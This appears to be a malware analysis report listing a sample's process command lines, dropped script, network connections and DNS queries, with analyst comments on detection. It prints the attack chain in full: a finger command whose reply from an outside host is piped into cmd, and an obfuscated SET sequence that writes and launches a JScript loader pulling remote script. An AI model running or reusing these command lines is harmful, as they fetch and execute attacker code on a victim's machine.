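Technical Information
(The entries below are process command lines, one file path, host:port connections and DNS queries. Hostnames containing `#` are masked; two of them match hosts shown in full in the command lines: wewr39aegk.hivecloud.xyz and eteehv.cyxxuawadkom.date.)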
- '<SYSTEM32>\finger.exe' ok@wewr39aegk.hivecloud.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\iyZ.js"
- %LOCALAPPDATA%\iyz.js
- 'we######gk.hivecloud.xyz':79
- 'et####.#yxxuawadkom.date':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'we######gk.hivecloud.xyz':79
- 'cl###flare.com':443
- DNS ASK we######gk.hivecloud.xyz
- DNS ASK et####.#yxxuawadkom.date
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
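- '<SYSTEM32>\cmd.exe' /c finger ok@wewr39aegk.hivecloud.xyz |more +2 |cmd
  (The finger reply is piped through more and into cmd, so text returned by the remote host runs as commands. finger.exe started from cmd.exe and outbound connections to TCP port 79 are both worth alerting on.)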
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt OKIO=.j&&SEt EMMWK=vByYoarByYo a =ByYo 'scByYoriByYoptByYo:'; b =ByYo 'hByYoTtPByYo:'; GByYoetByYoObjByYoecByYot(ByYoa+b+'&&sET OU4X=RBOESRBOESeteehv.cyxxuawadkom.dateRBOES?1RBOES')...
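- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 8BOUY="%EMMWK:ByYo=%%OU4X:RBOES=/%" 0<nul 1>%LOCALAPPDATA%\iyZ%OKIO%s"
  (`%EMMWK:ByYo=%` strips the `ByYo` filler and `%OU4X:RBOES=/%` turns `RBOES` into `/`; the result is redirected to %LOCALAPPDATA%\iyZ.js, because OKIO is set to `.j`. The SEt command line above is truncated in this listing.)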
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\iyZ%OKIO%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\iyZ.js